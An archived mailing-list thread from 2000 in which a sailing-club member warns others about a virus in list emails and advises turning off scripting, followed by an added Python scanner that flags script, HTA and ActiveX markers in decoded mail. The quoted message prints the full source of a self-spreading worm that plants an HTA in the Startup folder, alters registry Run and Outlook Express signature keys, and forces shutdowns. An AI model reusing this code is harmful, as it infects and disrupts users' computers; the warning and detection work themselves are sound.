Virus (was Re: [alberg30] A30 article-huge file)

George Dinwiddie gdinwiddie at min.net
Sat Apr 15 17:38:04 PDT 2000


Joe,

I don't use Outlook Express, so I can't give you a step-by-step
instruction.  Look for a menu item labeled "options" or 
"preferences" or something like that.  In there, look for
something mentioning "active scripting" and disable it.
Also, see my other message on where to find the patch to
this security hole.

 - George

alberg30 wrote:
> 
> George, how do I turn off scripts? Although I got an email msg that said
> there was a virus in the email I sent, I have done a virus scan of my
> hard drive but show no sign of the virus. What gives?
> 
> ----- Original Message -----
> From: George Dinwiddie <gdinwiddie at min.net>
> To: <alberg30 at egroups.com>
> Cc: <support at egroups.com>
> Sent: Friday, April 14, 2000 8:45 PM
> Subject: Virus (was Re: [alberg30] A30 article-huge file)
> 
> > Joe,
> >
> > Your email contained the same virus that appeared in Towney's
> > email on the A30 list.  It shows up right above the ad banner
> > in the HTML source.  I'm beginning to think that perhaps it's
> > not your machine and Towney's machine, but egroups' server
> > that's infected.
> >
> > Please, everyone make sure that scripts are turned off in your
> > email software.  I can't imagine any reason you'd want an
> > email to automatically run something on your machine.
> >
> >  - George
> >
> >
> > --------------script source--------------
> > function sErr(){return
> > true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z=
> > <HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
> > ID=3D\"hO=
> > \" WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object
> > id=3D'w=
> > sh'
> >
> classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCR=
> > IPT>function sEr(){self.close();return
> > true;}window.onerror=3DsEr;fs=3Dnew =
> >
> ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=
> 3Df=
> > s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var
> > mye=3D=
> > new
> > Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew
> =
> >
> String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD
> =C9=
> >
> ~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\
> \\\=
> >
> StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(
> kfr=
> > ))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.File
> Exist=
> >
> s(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.GetF
> ile=
> >
> (aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?wd+'M
> ENU=
> > D=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@echo
> > off>'+=
> > pth);t1.WriteLine('del
> > '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFi=
> >
> le(kk,k2);fs.GetFile(k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.
> reg=
> >
> ');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\
> \\I=
> > dentities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
> > Express\\\\5.0';sg=
> > =3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default
> > Signature\"=
> >
> =3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000
> ]')=
> > ;t2.WriteLine('\"name\"=3D\"Signature
> > #1\"');t2.WriteLine('\"type\"=3Ddword=
> >
>:00000002');t2.WriteLine('\"text\"=3D\"\"');t2.Write('\"file\"=3D\"C:\\\
> \\\=
> >
> \\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');
> t2.=
> > Write('\"Signature
> > Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.Writ=
> >
> eLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Curren
> tVe=
> >
> rsion\\\\Run]');t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\
> \\\=
> >
> \\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit
> .ex=
> > e -s
> >
> '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML=
> > ><BODY><DIV
> style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OB=
> > JECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC
> > id=3Dscr></"+"OBJ=
> >
> ECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read(1)!=3D'Z');t3.W
> rit=
> > eLine('<SCRIPT><!--');t3.write('function sErr(){return
> > true;}window.onerror=
> >
> =3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095);t4.close();rd=3D/
> \\\=
> >
> \/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\\\').replace(re,'\
> \\\=
> >
> \"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=3D(navigator.system
> Lan=
> >
> guage)?navigator.systemLanguage:navigator.language;scr.Path=3D(la=3D=3D\
> "fr=
> > \")?\"C:\\\\\\\\windows\\\\\\\\Menu
> > D=E9marrer\\\\\\\\Programmes\\\\\\\\D=
> > =E9marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start
> > Menu\\\\\\\\Pr=
> >
> ograms\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.userAgent.toLower
> Cas=
> >
> e();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigator.appVersion)>4
> ))|=
> > |(agt.indexOf(\"msie
> > 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCR=
> >
> IPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd
> +'k=
> > ak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew
> > Date();if(d.get=
> > Date()=3D=3D1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not
> > today =
> > !');wsh.Run(wd+'RUNDLL32.EXE
> > user.exe,exitwindows');}self.close();</"+"SCRI=
> > PT>S3 driver memory alloc failed  
> > !]]%%%%%</"+"BODY></"+"HTML>";la=3D=
> >
> (navigator.systemLanguage)?navigator.systemLanguage:navigator.language;s
> cr.=
> > Path=3D(la=3D=3D"fr")?"C:\\windows\\Menu
> > D=E9marrer\\Programmes\\D=E9marrag=
> > e\\kak.hta":"C:\\windows\\Start
> > Menu\\Programs\\StartUp\\kak.hta";agt=3Dnav=
> >
> igator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D-1)&&(parseIn
> t(n=
> > avigator.appVersion)>4))||(agt.indexOf("msie 5.")!=3D-1))scr.write();
> >
> > ----------------------------------------------------------------------
> --
> > You can win $1000!
> > Time-limited offer.  Enter today at:
> > http://click.egroups.com/1/2864/5/_/476031/_/955762890/
> > ----------------------------------------------------------------------
> --
> >
> >
> 

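The advice in this thread is to disable active scripting in the mail client. A complementary check on the receiving side is to decode each MIME part's transfer encoding (the quoted-printable "=3D" noise in the quoted source above is exactly that layer) and then look for active-content markers in HTML bodies. The script below is an added example, not code from the thread or the list software; the indicator list, function names and the two sample messages (addresses under example.invalid) are constructed for illustration.

```python
"""Flag e-mail HTML parts that carry script, HTA or ActiveX content.

Added example: the sample messages below are constructed, not real list traffic.
"""
import email
import re
from email import policy

# Markers of active content in an HTML mail body. They are matched only after
# the transfer encoding has been decoded, so quoted-printable (=3D, soft line
# breaks) cannot split or hide them. Names are our own, not a standard list.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "hta_application": re.compile(r"<\s*hta:application\b", re.I),
    "activex_object": re.compile(r"\bActiveXObject\s*\(", re.I),
    "filesystem_object": re.compile(r"Scripting\.FileSystemObject", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
    "hta_file_reference": re.compile(r"\.hta\b", re.I),
}


def scan_message(raw: bytes) -> list:
    """Return (content_type, indicator_name, snippet) tuples for every
    indicator found in an HTML or HTA part of the message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        ctype = part.get_content_type()
        if ctype not in ("text/html", "application/hta"):
            continue
        # decode=True undoes quoted-printable / base64 before we inspect the text
        body = part.get_payload(decode=True) or b""
        text = body.decode(part.get_content_charset() or "latin-1", errors="replace")
        for name, pattern in INDICATORS.items():
            match = pattern.search(text)
            if match:
                snippet = text[match.start():match.start() + 40]
                findings.append((ctype, name, snippet))
    return findings


def has_active_content(raw: bytes) -> bool:
    """Convenience wrapper: True when any indicator fires."""
    return bool(scan_message(raw))


# Constructed sample: HTML part is quoted-printable encoded, with soft line
# breaks placed so that the markers are split across physical lines.
SAMPLE_WITH_SCRIPT = b"""From: someone@example.invalid
To: list@example.invalid
Subject: A30 article
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Here is the article.
--b1
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY>Here is the article.<SCRIPT>fs=3Dnew ActiveXObject('Scrip=
ting.FileSystemObject');</SCRIPT><HTA:APPLICATION ID=3D"hO" WINDOWSTATE=3DM=
inimize></BODY></HTML>
--b1--
"""

# Constructed sample: plain HTML mail with no active content.
SAMPLE_CLEAN = b"""From: someone@example.invalid
To: list@example.invalid
Subject: A30 article
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<HTML><BODY><P>Here is the article.</P></BODY></HTML>
"""

if __name__ == "__main__":
    for label, sample in (("with script", SAMPLE_WITH_SCRIPT), ("clean", SAMPLE_CLEAN)):
        print(label, "->", scan_message(sample))
```

The snippet returned with each finding is enough to locate the offending fragment in the decoded body; the raw quoted-printable lines, as the quoted message shows, are much harder to read by eye.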
